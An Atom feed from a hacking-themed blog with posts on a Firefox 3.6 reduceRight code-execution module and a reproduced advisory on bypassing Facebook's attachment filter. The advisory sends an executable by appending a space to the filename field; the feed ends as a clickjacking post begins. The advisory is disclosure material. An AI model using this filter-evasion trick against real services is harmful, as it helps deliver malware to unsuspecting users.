<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2408596200810928464</id><updated>2024-11-05T19:09:53.299-08:00</updated><category term="metasploit"/><category term="Facebook"/><category term="Clickjacking"/><category term="Hacking"/><category term="IT-Security ©"/><category term="Vulnerability"/><category term="BeEF"/><category term="Botnet"/><category term="Bypassing 403 Forbidden Errors"/><category term="DLL Injection"/><category term="Ettercap"/><category term="EvilGrade"/><category term="Exploits"/><category term="Finding Subdomains using Goorecon"/><category term="Fireforce"/><category term="Firefox Exploit"/><category term="Gmail Flash Exploit"/><category term="Happy New Year"/><category term="Honeypot"/><category term="Insert Backdoor via phpMyAdmin"/><category term="Install IRC Server from shell"/><category term="Pyrit"/><category term="Remote Keylogger Firefox"/><category term="RootKits Analysis"/><category term="Router Hacking"/><category term="Session Hijacking"/><category term="Sniffing Images"/><category term="Static Analysis"/><category term="XLSInjector"/><category term="create e nc backdoor whith metasploit meterprent"/><category term="google"/><category term="nmap"/><title type='text'>IT-Security ©</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default?start-index=26&amp;max-results=25&amp;redirect=false'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>68</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-8149379335482168543</id><published>2015-12-15T13:21:00.001-08:00</published><updated>2015-12-15T13:21:12.917-08:00</updated><title type='text'>Hey guys!!</title><content type='html'>&lt;br /&gt;
Hey ppl i was a bit busy whith life and stuff sorry for no new posts long time&lt;br /&gt;
somthing new will come soon :)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# ITS © # 2009 - 2016</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/8149379335482168543/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2015/12/hey-guys.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/8149379335482168543'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/8149379335482168543'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2015/12/hey-guys.html' title='Hey guys!!'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-376139770887132961</id><published>2011-10-30T09:55:00.000-07:00</published><updated>2011-10-30T09:55:33.845-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Firefox Exploit"/><title type='text'>Mozilla Firefox Array.reduceRight() Vulnerability</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt18000/screen-shot-2011-08-09-at-91029-am.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;227&quot; src=&quot;http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt18000/screen-shot-2011-08-09-at-91029-am.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;iframe allowfullscreen=&#39;allowfullscreen&#39; webkitallowfullscreen=&#39;webkitallowfullscreen&#39; mozallowfullscreen=&#39;mozallowfullscreen&#39; width=&#39;320&#39; height=&#39;266&#39; src=&#39;https://www.youtube.com/embed/UEX0E2Qv0sc?feature=player_embedded&#39; frameborder=&#39;0&#39;&gt;&lt;/iframe&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;This module exploits a vulnerability found in Mozilla Firefox 3.6 when 
an array object is configured with a large length value , the 
reduceRigh() method may cause an invalid index being used , allowing 
arbitary remote code execution . Please note that the exploit requires a
 longer amount of time ( compare to a typical browser exploit) in order 
to gain control of the machine&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;More :&amp;nbsp;http://www.exploit-db.com/exploits/17612/&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Trebuchet MS&#39;, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana, sans-serif;&quot;&gt;# ITS © &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana, sans-serif;&quot;&gt;# 2009 - 2011&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/376139770887132961/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2011/10/mozilla-firefox-arrayreduceright.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/376139770887132961'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/376139770887132961'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2011/10/mozilla-firefox-arrayreduceright.html' title='Mozilla Firefox Array.reduceRight() Vulnerability'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-5014510600269083995</id><published>2011-10-28T07:49:00.000-07:00</published><updated>2011-10-28T07:51:56.667-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><title type='text'>Facebook Attach EXE Vulnerability</title><content type='html'>&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; color: #5c5c5c; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;post-body entry-content&quot; style=&quot;position: relative; width: 590px;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 22px;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-size: 13px; line-height: 1.4; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhabNkM9q8Ixj9aBIudbV4I7SwfOaLldLM7MZ86UjoR_l0OScGG3ItqwyEpg1wWyq3d8dbMVvs_Zh7KmSchi-iD_tHfc_UmOTBbhvPc1Dv3dhrHPh4R1wAURvSrt9x12aDW0PknLSGvKb8/s1600/facebook3.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; color: #d83028; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhabNkM9q8Ixj9aBIudbV4I7SwfOaLldLM7MZ86UjoR_l0OScGG3ItqwyEpg1wWyq3d8dbMVvs_Zh7KmSchi-iD_tHfc_UmOTBbhvPc1Dv3dhrHPh4R1wAURvSrt9x12aDW0PknLSGvKb8/s200/facebook3.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(242, 242, 242); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(242, 242, 242); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(242, 242, 242); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(242, 242, 242); border-top-style: solid; border-top-width: 1px; border-width: initial; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; position: relative;&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;1. Summary:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;When using the Facebook &#39;Messages&#39; tab, there is a feature to attach a file.&amp;nbsp;Using this feature normally, the site won&#39;t allow a user to attach an executable file.&amp;nbsp;A bug was discovered to subvert this security mechanisms. Note, you do NOT have&amp;nbsp;to be friends with the user to send them a message with an attachment.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;2. Description:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;When attaching an executable file, Facebook will return an error message stating:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;&quot;Error Uploading: You cannot attach files of that type.&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-size: 13px; line-height: 1.4; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUyidwP4rcFg_I9j72igmjZHqqA7JDxfOGg9ppu1bI3_WYyXKgN2eu9iGlX5uNoV3PG4odOHVOj8Igjb_9TxRcvd6Fcu1qjhOGrYlcfXMho_XsSFlF6AstKqdvXuRz6-GOjOtd8qs2nyI/s1600/error_uploading.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; color: #d83028; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUyidwP4rcFg_I9j72igmjZHqqA7JDxfOGg9ppu1bI3_WYyXKgN2eu9iGlX5uNoV3PG4odOHVOj8Igjb_9TxRcvd6Fcu1qjhOGrYlcfXMho_XsSFlF6AstKqdvXuRz6-GOjOtd8qs2nyI/s1600/error_uploading.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(242, 242, 242); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(242, 242, 242); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(242, 242, 242); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(242, 242, 242); border-top-style: solid; border-top-width: 1px; border-width: initial; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; position: relative;&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;When uploading a file attachment to Facebook we captured the web browsers POST request being sent&amp;nbsp;to the web server. Inside this POST request reads the line:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;Content-Disposition: form-data; name=&quot;attachment&quot;; filename=&quot;cmd.exe&quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;It was discovered the variable &#39;filename&#39; was being parsed to determine if the file type is allowed&amp;nbsp;or not.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;To subvert the security mechanisms to allow an .exe file type, we modified the POST request by&amp;nbsp;appending a space to our filename variable like so:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;filename=&quot;cmd.exe &quot;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-size: 13px; line-height: 1.4; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-size: 13px; line-height: 1.4; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-size: 13px; line-height: 1.4; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjn8hP0JyZ5d9Ob0ioynFdWdhQDwrFOW5hMRRKxg2FAnrSwdI6wpdWVwfPzW1CzMraoNGNhnq8GYTmBvmI2Id4iXrnHTtyMtaCCucUBOm3qPTLZCxyvI_LDeXepzLm74rfW00cuKJJk2w/s1600/post.jpg&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; color: #d83028; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjn8hP0JyZ5d9Ob0ioynFdWdhQDwrFOW5hMRRKxg2FAnrSwdI6wpdWVwfPzW1CzMraoNGNhnq8GYTmBvmI2Id4iXrnHTtyMtaCCucUBOm3qPTLZCxyvI_LDeXepzLm74rfW00cuKJJk2w/s640/post.jpg&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(242, 242, 242); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(242, 242, 242); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(242, 242, 242); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(242, 242, 242); border-top-style: solid; border-top-width: 1px; border-width: initial; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; position: relative;&quot; width=&quot;564&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;This was enough to trick the parser and allow our executable file to be attached and sent in a&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;message.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; font-size: 13px; line-height: 1.4; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhER5es1rTkB74OAZPr-o2FsbXG2zgZ1c6_4HreBXHJMXcb8SPklIBX7Qtpy8dncofSQfWMej9hyphenhyphenLkbOxgux53Aoautn4DXRKv5yJa1xDdGlGe05FVxORNceXyDSij3aEcS03EWqxFlZiI/s1600/hot_stuff.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; color: #d83028; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhER5es1rTkB74OAZPr-o2FsbXG2zgZ1c6_4HreBXHJMXcb8SPklIBX7Qtpy8dncofSQfWMej9hyphenhyphenLkbOxgux53Aoautn4DXRKv5yJa1xDdGlGe05FVxORNceXyDSij3aEcS03EWqxFlZiI/s1600/hot_stuff.png&quot; style=&quot;-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-attachment: initial; background-clip: initial; background-color: white; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(242, 242, 242); border-bottom-style: solid; border-bottom-width: 1px; border-color: initial; border-left-color: rgb(242, 242, 242); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(242, 242, 242); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(242, 242, 242); border-top-style: solid; border-top-width: 1px; border-width: initial; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; position: relative;&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;3. Impact:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;Potentially allow an attacker to compromise a victim’s computer system.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;4. Affected Products:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;www.facebook.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;5. Time Table:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;09/30/2011 Reported Vulnerability to the Vendor&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;10/26/2011 Vendor Acknowledged&amp;nbsp;Vulnerability&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;10/27/2011 Publicly Disclosed&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;6. Credits:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;Discovered by Nathan Power&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;www.securitypentest.com&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 1.4;&quot;&gt;----------------------------------------------------------------------------------------------------------------------------------------&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: xx-small;&quot;&gt;# ITS ©&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: &#39;Helvetica Neue&#39;, Arial, Helvetica, sans-serif; font-size: xx-small;&quot;&gt;# 2009 - 2011&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/5014510600269083995/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2011/10/facebook-attach-exe-vulnerability.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/5014510600269083995'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/5014510600269083995'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2011/10/facebook-attach-exe-vulnerability.html' title='Facebook Attach EXE Vulnerability'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhabNkM9q8Ixj9aBIudbV4I7SwfOaLldLM7MZ86UjoR_l0OScGG3ItqwyEpg1wWyq3d8dbMVvs_Zh7KmSchi-iD_tHfc_UmOTBbhvPc1Dv3dhrHPh4R1wAURvSrt9x12aDW0PknLSGvKb8/s72-c/facebook3.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-2304110249187973637</id><published>2011-10-08T04:42:00.000-07:00</published><updated>2011-10-08T04:42:49.335-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Clickjacking"/><title type='text'>Clickjacking for Shells</title><content type='html'>&lt;object style=&quot;height: 390px; width: 640px;&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/x4BrnSsrMg8?version=3&quot;&gt;
&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;
&lt;param name=&quot;allowScriptAccess&quot; value=&quot;always&quot;&gt;
